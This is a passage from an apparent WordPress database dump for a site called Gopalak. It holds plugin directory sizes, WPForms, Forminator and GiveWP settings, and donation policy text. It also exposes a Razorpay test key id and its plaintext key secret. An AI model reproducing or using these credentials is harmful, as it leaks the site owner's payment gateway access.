woocommerce/src/Admin/API/Reports/Categories\";i:24546;s:101:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API/Reports/Coupons/Stats\";i:37806;s:95:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API/Reports/Coupons\";i:66228;s:103:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API/Reports/Customers/Stats\";i:22009;s:97:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API/Reports/Customers\";i:76217;s:103:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API/Reports/Downloads/Files\";i:594;s:103:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API/Reports/Downloads/Stats\";i:21588;s:97:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API/Reports/Downloads\";i:51094;s:94:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API/Reports/Export\";i:7032;s:94:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API/Reports/Import\";i:8870;s:100:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API/Reports/Orders/Stats\";i:69168;s:94:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API/Reports/Orders\";i:110416;s:109:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API/Reports/PerformanceIndicators\";i:19749;s:102:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API/Reports/Products/Stats\";i:35666;s:96:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API/Reports/Products\";i:69448;s:101:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API/Reports/Revenue/Stats\";i:15905;s:95:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API/Reports/Revenue\";i:17505;s:99:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API/Reports/Stock/Stats\";i:8847;s:93:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API/Reports/Stock\";i:27482;s:99:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API/Reports/Taxes/Stats\";i:30371;s:93:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API/Reports/Taxes\";i:53316;s:104:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API/Reports/Variations/Stats\";i:37316;s:98:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API/Reports/Variations\";i:71786;s:87:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API/Reports\";i:719393;s:89:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API/Templates\";i:6234;s:79:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/API\";i:960626;s:84:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/Composer\";i:2432;s:92:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/DateTimeProvider\";i:885;s:95:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/Features/Navigation\";i:48763;s:106:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/Features/OnboardingTasks/Tasks\";i:40903;s:100:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/Features/OnboardingTasks\";i:82754;s:110:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/Features/PaymentGatewaySuggestions\";i:32445;s:84:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/Features\";i:183078;s:85:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/Marketing\";i:8523;s:81:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/Notes\";i:74606;s:85:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/Overrides\";i:11227;s:91:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/PluginsProvider\";i:2800;s:113:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/RemoteInboxNotifications/Transformers\";i:7998;s:100:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/RemoteInboxNotifications\";i:68377;s:86:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin/Schedulers\";i:9968;s:75:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Admin\";i:1395510;s:77:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Caching\";i:19018;s:86:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Checkout/Helpers\";i:8175;s:78:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Checkout\";i:8175;s:106:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Database/Migrations/CustomOrderTable\";i:39129;s:89:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Database/Migrations\";i:91060;s:78:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Database\";i:91060;s:90:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Internal/Admin/Notes\";i:118306;s:95:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Internal/Admin/Onboarding\";i:38739;s:101:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Internal/Admin/Orders/MetaBoxes\";i:13716;s:91:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Internal/Admin/Orders\";i:56256;s:99:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Internal/Admin/ProductReviews\";i:72677;s:105:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Internal/Admin/RemoteFreeExtensions\";i:24095;s:95:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Internal/Admin/Schedulers\";i:22501;s:99:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Internal/Admin/WCPayPromotion\";i:7933;s:84:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Internal/Admin\";i:499172;s:94:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Internal/BatchProcessing\";i:18762;s:96:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Internal/DataStores/Orders\";i:123289;s:89:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Internal/DataStores\";i:128327;s:116:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Internal/DependencyManagement/ServiceProviders\";i:14760;s:99:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Internal/DependencyManagement\";i:29745;s:85:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Internal/Orders\";i:4875;s:102:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Internal/ProductAttributesLookup\";i:55925;s:121:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Internal/ProductDownloads/ApprovedDirectories/Admin\";i:29372;s:115:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Internal/ProductDownloads/ApprovedDirectories\";i:53710;s:95:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Internal/ProductDownloads\";i:53710;s:87:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Internal/Settings\";i:1578;s:88:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Internal/Utilities\";i:30951;s:84:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Internal/WCCom\";i:654;s:78:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Internal\";i:839576;s:77:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Proxies\";i:5113;s:79:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src/Utilities\";i:12775;s:69:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/src\";i:2382362;s:80:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/templates/auth\";i:6620;s:80:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/templates/cart\";i:30681;s:84:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/templates/checkout\";i:32789;s:88:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/templates/emails/plain\";i:35775;s:82:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/templates/emails\";i:83954;s:82:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/templates/global\";i:9882;s:80:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/templates/loop\";i:10443;s:85:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/templates/myaccount\";i:47059;s:83:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/templates/notices\";i:2782;s:81:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/templates/order\";i:17640;s:102:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/templates/single-product/add-to-cart\";i:15041;s:95:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/templates/single-product/tabs\";i:3986;s:90:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/templates/single-product\";i:42089;s:75:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/templates\";i:308835;s:106:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src\";i:81237;s:102:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader\";i:81237;s:105:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/automattic/jetpack-constants/src\";i:3370;s:101:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/automattic/jetpack-constants\";i:3370;s:83:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/automattic\";i:84607;s:76:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/bin\";i:19363;s:116:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers\";i:77612;s:105:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer\";i:77612;s:96:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/composer/installers/src\";i:78080;s:92:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/composer/installers\";i:79355;s:81:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/composer\";i:622605;s:91:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/jetpack-autoloader\";i:51170;s:100:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/maxmind-db/reader/ext/tests\";i:709;s:94:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/maxmind-db/reader/ext\";i:31960;s:112:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/maxmind-db/reader/src/MaxMind/Db/Reader\";i:14712;s:105:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/maxmind-db/reader/src/MaxMind/Db\";i:26352;s:102:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/maxmind-db/reader/src/MaxMind\";i:26352;s:94:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/maxmind-db/reader/src\";i:26352;s:90:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/maxmind-db/reader\";i:73510;s:83:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/maxmind-db\";i:73510;s:102:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/pelago/emogrifier/src/Caching\";i:2073;s:98:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/pelago/emogrifier/src/Css\";i:8803;s:108:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/pelago/emogrifier/src/HtmlProcessor\";i:30875;s:104:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/pelago/emogrifier/src/Utilities\";i:8638;s:94:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/pelago/emogrifier/src\";i:93292;s:90:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/pelago/emogrifier\";i:94360;s:79:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/pelago\";i:94360;s:110:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/sabberworm/php-css-parser/src/CSSList\";i:29203;s:110:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/sabberworm/php-css-parser/src/Comment\";i:1617;s:110:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/sabberworm/php-css-parser/src/Parsing\";i:16119;s:111:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/sabberworm/php-css-parser/src/Property\";i:12540;s:107:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/sabberworm/php-css-parser/src/Rule\";i:10160;s:110:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/sabberworm/php-css-parser/src/RuleSet\";i:41962;s:108:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/sabberworm/php-css-parser/src/Value\";i:33050;s:102:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/sabberworm/php-css-parser/src\";i:161410;s:98:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/sabberworm/php-css-parser\";i:162514;s:83:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/sabberworm\";i:162514;s:103:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/symfony/css-selector/Exception\";i:4318;s:98:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/symfony/css-selector/Node\";i:17182;s:108:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/symfony/css-selector/Parser/Handler\";i:10164;s:109:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/symfony/css-selector/Parser/Shortcut\";i:5802;s:110:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/symfony/css-selector/Parser/Tokenizer\";i:6587;s:100:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/symfony/css-selector/Parser\";i:42874;s:109:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/symfony/css-selector/XPath/Extension\";i:29007;s:99:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/symfony/css-selector/XPath\";i:39722;s:93:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/symfony/css-selector\";i:107161;s:111:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs\";i:1014;s:105:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources\";i:1014;s:95:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80\";i:9368;s:80:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor/symfony\";i:116529;s:72:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce/vendor\";i:1225402;s:65:\"/storage/v6964/gopalak/public_html/wp-content/plugins/woocommerce\";i:29658660;s:99:\"/storage/v6964/gopalak/public_html/wp-content/plugins/perfect-woocommerce-brands/assets/backend/img\";i:62610;s:95:\"/storage/v6964/gopalak/public_html/wp-content/plugins/perfect-woocommerce-brands/assets/backend\";i:62610;s:91:\"/storage/v6964/gopalak/public_html/wp-content/plugins/perfect-woocommerce-brands/assets/css\";i:26528;s:102:\"/storage/v6964/gopalak/public_html/wp-content/plugins/perfect-woocommerce-brands/assets/img/dummy-data\";i:69326;s:91:\"/storage/v6964/gopalak/public_html/wp-content/plugins/perfect-woocommerce-brands/assets/img\";i:69326;s:90:\"/storage/v6964/gopalak/public_html/wp-content/plugins/perfect-woocommerce-brands/assets/js\";i:32428;s:103:\"/storage/v6964/gopalak/public_html/wp-content/plugins/perfect-woocommerce-brands/assets/lib/slick/fonts\";i:7486;s:97:\"/storage/v6964/gopalak/public_html/wp-content/plugins/perfect-woocommerce-brands/assets/lib/slick\";i:164413;s:91:\"/storage/v6964/gopalak/public_html/wp-content/plugins/perfect-woocommerce-brands/assets/lib\";i:164413;s:87:\"/storage/v6964/gopalak/public_html/wp-content/plugins/perfect-woocommerce-brands/assets\";i:355305;s:94:\"/storage/v6964/gopalak/public_html/wp-content/plugins/perfect-woocommerce-brands/classes/admin\";i:55273;s:99:\"/storage/v6964/gopalak/public_html/wp-content/plugins/perfect-woocommerce-brands/classes/shortcodes\";i:14069;s:96:\"/storage/v6964/gopalak/public_html/wp-content/plugins/perfect-woocommerce-brands/classes/widgets\";i:18170;s:88:\"/storage/v6964/gopalak/public_html/wp-content/plugins/perfect-woocommerce-brands/classes\";i:136747;s:100:\"/storage/v6964/gopalak/public_html/wp-content/plugins/perfect-woocommerce-brands/includes/quadlayers\";i:56359;s:89:\"/storage/v6964/gopalak/public_html/wp-content/plugins/perfect-woocommerce-brands/includes\";i:56359;s:85:\"/storage/v6964/gopalak/public_html/wp-content/plugins/perfect-woocommerce-brands/lang\";i:51543;s:96:\"/storage/v6964/gopalak/public_html/wp-content/plugins/perfect-woocommerce-brands/templates/admin\";i:1155;s:101:\"/storage/v6964/gopalak/public_html/wp-content/plugins/perfect-woocommerce-brands/templates/shortcodes\";i:3588;s:98:\"/storage/v6964/gopalak/public_html/wp-content/plugins/perfect-woocommerce-brands/templates/widgets\";i:2830;s:90:\"/storage/v6964/gopalak/public_html/wp-content/plugins/perfect-woocommerce-brands/templates\";i:7573;s:80:\"/storage/v6964/gopalak/public_html/wp-content/plugins/perfect-woocommerce-brands\";i:623766;s:53:\"/storage/v6964/gopalak/public_html/wp-content/plugins\";i:219093532;s:61:\"/storage/v6964/gopalak/public_html/wp-content/uploads/2020/06\";i:2093968;s:61:\"/storage/v6964/gopalak/public_html/wp-content/uploads/2020/07\";i:222183;s:58:\"/storage/v6964/gopalak/public_html/wp-content/uploads/2020\";i:2316151;s:61:\"/storage/v6964/gopalak/public_html/wp-content/uploads/2022/01\";i:42626491;s:61:\"/storage/v6964/gopalak/public_html/wp-content/uploads/2022/02\";i:73995820;s:61:\"/storage/v6964/gopalak/public_html/wp-content/uploads/2022/03\";i:86412480;s:61:\"/storage/v6964/gopalak/public_html/wp-content/uploads/2022/04\";i:0;s:61:\"/storage/v6964/gopalak/public_html/wp-content/uploads/2022/05\";i:0;s:61:\"/storage/v6964/gopalak/public_html/wp-content/uploads/2022/06\";i:0;s:61:\"/storage/v6964/gopalak/public_html/wp-content/uploads/2022/07\";i:0;s:61:\"/storage/v6964/gopalak/public_html/wp-content/uploads/2022/08\";i:0;s:61:\"/storage/v6964/gopalak/public_html/wp-content/uploads/2022/09\";i:1429749;s:58:\"/storage/v6964/gopalak/public_html/wp-content/uploads/2022\";i:204464540;s:64:\"/storage/v6964/gopalak/public_html/wp-content/uploads/apppresser\";i:0;s:64:\"/storage/v6964/gopalak/public_html/wp-content/uploads/buddypress\";i:0;s:95:\"/storage/v6964/gopalak/public_html/wp-content/uploads/contest-gallery/changes-messages-frontend\";i:5;s:90:\"/storage/v6964/gopalak/public_html/wp-content/uploads/contest-gallery/gallery-general/json\";i:0;s:85:\"/storage/v6964/gopalak/public_html/wp-content/uploads/contest-gallery/gallery-general\";i:0;s:102:\"/storage/v6964/gopalak/public_html/wp-content/uploads/contest-gallery/gallery-id-1/json/image-comments\";i:0;s:98:\"/storage/v6964/gopalak/public_html/wp-content/uploads/contest-gallery/gallery-id-1/json/image-data\";i:0;s:98:\"/storage/v6964/gopalak/public_html/wp-content/uploads/contest-gallery/gallery-id-1/json/image-info\";i:0;s:87:\"/storage/v6964/gopalak/public_html/wp-content/uploads/contest-gallery/gallery-id-1/json\";i:8814;s:82:\"/storage/v6964/gopalak/public_html/wp-content/uploads/contest-gallery/gallery-id-1\";i:8834;s:69:\"/storage/v6964/gopalak/public_html/wp-content/uploads/contest-gallery\";i:8839;s:67:\"/storage/v6964/gopalak/public_html/wp-content/uploads/elementor/css\";i:10423;s:63:\"/storage/v6964/gopalak/public_html/wp-content/uploads/elementor\";i:10423;s:66:\"/storage/v6964/gopalak/public_html/wp-content/uploads/nginx-helper\";i:0;s:61:\"/storage/v6964/gopalak/public_html/wp-content/uploads/pop_pdf\";i:0;s:68:\"/storage/v6964/gopalak/public_html/wp-content/uploads/progressive-wp\";i:0;s:63:\"/storage/v6964/gopalak/public_html/wp-content/uploads/themehunk\";i:0;s:61:\"/storage/v6964/gopalak/public_html/wp-content/uploads/wc-logs\";i:653242;s:58:\"/storage/v6964/gopalak/public_html/wp-content/uploads/wcfm\";i:16282;s:73:\"/storage/v6964/gopalak/public_html/wp-content/uploads/woocommerce_uploads\";i:13;s:65:\"/storage/v6964/gopalak/public_html/wp-content/uploads/wpdesk-logs\";i:23384;s:77:\"/storage/v6964/gopalak/public_html/wp-content/uploads/wpforms/cache/templates\";i:2;s:67:\"/storage/v6964/gopalak/public_html/wp-content/uploads/wpforms/cache\";i:324106;s:61:\"/storage/v6964/gopalak/public_html/wp-content/uploads/wpforms\";i:324843;s:108:\"/storage/v6964/gopalak/public_html/wp-content/uploads/wpo_wcpdf_7ffbaca906bc5d016a7907256d32e2a4/attachments\";i:3323095;s:103:\"/storage/v6964/gopalak/public_html/wp-content/uploads/wpo_wcpdf_7ffbaca906bc5d016a7907256d32e2a4/dompdf\";i:264;s:102:\"/storage/v6964/gopalak/public_html/wp-content/uploads/wpo_wcpdf_7ffbaca906bc5d016a7907256d32e2a4/fonts\";i:5045427;s:96:\"/storage/v6964/gopalak/public_html/wp-content/uploads/wpo_wcpdf_7ffbaca906bc5d016a7907256d32e2a4\";i:8368786;s:53:\"/storage/v6964/gopalak/public_html/wp-content/uploads\";i:216521720;}','yes'),(129446,'rzp_woocommerce_current_version','','yes'),(129453,'landingi_plugin_token','Token','yes'),(129454,'plugin_activation_landingi-landing-pages/landingi-plugin.php','2022-09-20 17:46:52','yes'),(136307,'wpforms_email_summaries_fetch_info_blocks_last_run','1746906931','yes'),(136308,'wpforms_process_forms_locator_status','completed','yes'),(136971,'wpforms_notifications','a:4:{s:4:\"feed\";a:2:{i:0;a:6:{s:5:\"title\";s:32:\"This is not your average update!\";s:7:\"content\";s:315:\"<p>Our new Calculations addon offers endless possibilities for creating unique, realtime calculator forms. Provide custom quotes, add variable shipping fees, create bulk discounts, and much more!</p>\r\n\r\n<p>We\'ve made it easy to create simple calculations or complex, advanced formulas right in the form builder.</p>\";s:4:\"type\";a:1:{i:0;s:4:\"lite\";}s:2:\"id\";i:236;s:4:\"btns\";a:2:{s:4:\"main\";a:2:{s:3:\"url\";s:183:\"https://wpforms.com/introducing-new-wpforms-calculations-addon/?utm_source=WordPress&utm_campaign=liteplugin&utm_medium=Plugin Notification&utm_content=WPForms Calculations Learn More\";s:4:\"text\";s:10:\"Learn More\";}s:3:\"alt\";a:2:{s:3:\"url\";s:163:\"https://wpforms.com/wpforms-lite-upgrade/?utm_source=WordPress&utm_medium=liteplugin&utm_campaign=Plugin Notification&utm_content=WPForms Calculations Lite Upgrade\";s:4:\"text\";s:14:\"Upgrade to Pro\";}}s:5:\"start\";s:19:\"2023-11-01 00:00:00\";}i:1;a:6:{s:5:\"title\";s:36:\"Payment and Donation forms are here!\";s:7:\"content\";s:400:\"Our Stripe integration lets you take credit cards payments in your forms without the hassle of setting up an eCommerce plugin and it\'s available now, <strong>free</strong>!\r\n\r\nBuild forms with payment fields, track payments in your dashboard, and even try our most popular payment form templates. Plus, with brand new payment tracking screens, it’s easy to start taking payments or donations today.\";s:4:\"type\";a:1:{i:0;s:4:\"lite\";}s:2:\"id\";i:225;s:4:\"btns\";a:2:{s:4:\"main\";a:2:{s:3:\"url\";s:175:\"https://wpforms.com/docs/using-stripe-with-wpforms-lite/?utm_source=WordPress&utm_campaign=liteplugin&utm_medium=Plugin Notification&utm_content=WPForms 1.8.2 Lite Get Started\";s:4:\"text\";s:11:\"Get Started\";}s:3:\"alt\";a:2:{s:3:\"url\";s:201:\"https://wpforms.com/introducing-wpforms-1-8-2-new-stripe-payments-for-wpforms-lite/?utm_source=WordPress&utm_campaign=liteplugin&utm_medium=Plugin Notification&utm_content=WPForms 1.8.2 Lite Learn More\";s:4:\"text\";s:10:\"Learn More\";}}s:5:\"start\";s:19:\"2023-10-06 00:00:00\";}}s:6:\"events\";a:0:{}s:9:\"dismissed\";a:0:{}s:6:\"update\";i:1704868718;}','yes'),(139279,'woocommerce_downloads_deliver_inline','','no'),(141077,'plugin_activation_razorpay-payment-button/razorpay-payment-buttons.php','2022-10-14 10:35:52','yes'),(141118,'enabled_field','','yes'),(141119,'title_field','Credit Card/Debit Card/NetBanking','yes'),(141120,'description_field','Pay securely by Credit or Debit card or internet banking through Razorpay','yes'),(141121,'key_id_field','rzp_test_uLspAPRQgxEJ0S','yes'),(141122,'key_secret_field','5adwp7r9i8xNLer5vQwJb5e6','yes'),(141123,'payment_action_field','capture','yes'),(141224,'forminator_free_install_date','1665744945','no'),(141225,'plugin_activation_forminator/forminator.php','2022-10-14 10:55:45','yes'),(141226,'wpmudev_recommended_plugins_registered','a:1:{s:25:\"forminator/forminator.php\";a:1:{s:13:\"registered_at\";i:1665725147;}}','no'),(141227,'forminator_version','1.43.1','yes'),(141228,'widget_forminator_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(141273,'forminator_appearance_presets','a:1:{s:7:\"default\";s:14:\"Default Preset\";}','yes'),(141274,'wpmudev_notices','a:3:{s:7:\"plugins\";a:1:{s:10:\"forminator\";i:1665725405;}s:5:\"queue\";a:1:{s:10:\"forminator\";a:3:{s:5:\"email\";i:1665725405;s:4:\"rate\";i:1666330205;s:8:\"giveaway\";i:1665898205;}}s:4:\"done\";a:0:{}}','no'),(141300,'plugin_activation_wc-donation-platform/wc-donation-platform.php','2022-10-14 11:03:39','yes'),(141413,'forminator_posts_map','a:0:{}','yes'),(141436,'product_cat_children','a:0:{}','yes'),(142344,'give_settings','a:50:{s:12:\"base_country\";s:2:\"US\";s:9:\"test_mode\";s:7:\"enabled\";s:8:\"currency\";s:3:\"USD\";s:17:\"currency_position\";s:6:\"before\";s:16:\"session_lifetime\";s:6:\"604800\";s:12:\"email_access\";s:7:\"enabled\";s:19:\"thousands_separator\";s:1:\",\";s:17:\"decimal_separator\";s:1:\".\";s:15:\"number_decimals\";i:2;s:26:\"sequential-ordering_status\";s:7:\"enabled\";s:3:\"css\";s:7:\"enabled\";s:11:\"floatlabels\";s:8:\"disabled\";s:13:\"company_field\";s:8:\"disabled\";s:17:\"name_title_prefix\";s:8:\"disabled\";s:14:\"forms_singular\";s:7:\"enabled\";s:14:\"forms_archives\";s:7:\"enabled\";s:13:\"forms_excerpt\";s:7:\"enabled\";s:17:\"form_featured_img\";s:7:\"enabled\";s:12:\"form_sidebar\";s:7:\"enabled\";s:10:\"categories\";s:8:\"disabled\";s:4:\"tags\";s:8:\"disabled\";s:5:\"terms\";s:8:\"disabled\";s:13:\"admin_notices\";s:7:\"enabled\";s:5:\"cache\";s:7:\"enabled\";s:19:\"uninstall_on_delete\";s:8:\"disabled\";s:18:\"the_content_filter\";s:7:\"enabled\";s:14:\"scripts_footer\";s:8:\"disabled\";s:20:\"agree_to_terms_label\";s:15:\"Agree to Terms?\";s:14:\"agreement_text\";s:1899:\"<p>Acceptance of any contribution, gift or grant is at the discretion of the Gopalak. The  Gopalak will not accept any gift unless it can be used or expended consistently with the purpose and mission of the  Gopalak.</p>\n				<p>No irrevocable gift, whether outright or life-income in character, will be accepted if under any reasonable set of circumstances the gift would jeopardize the donor’s financial security.</p>\n				<p>The Gopalak will refrain from providing advice about the tax or other treatment of gifts and will encourage donors to seek guidance from their own professional advisers to assist them in the process of making their donation.</p>\n				<p>The Gopalak will accept donations of cash or publicly traded securities. Gifts of in-kind services will be accepted at the discretion of the Gopalak.</p>\n				<p>Certain other gifts, real property, personal property, in-kind gifts, non-liquid securities, and contributions whose sources are not transparent or whose use is restricted in some manner, must be reviewed prior to acceptance due to the special obligations raised or liabilities they may pose for Gopalak.</p>\n				<p>The Gopalak will provide acknowledgments to donors meeting tax requirements for property received by the charity as a gift. However, except for gifts of cash and publicly traded securities, no value shall be ascribed to any receipt or other form of substantiation of a gift received by Gopalak.</p>\n				<p>The Gopalak will respect the intent of the donor relating to gifts for restricted purposes and those relating to the desire to remain anonymous. With respect to anonymous gifts, the Gopalak will restrict information about the donor to only those staff members with a need to know.</p>\n				<p>The Gopalak will not compensate, whether through commissions, finders\' fees, or other means, any third party for directing a gift or a donor to the 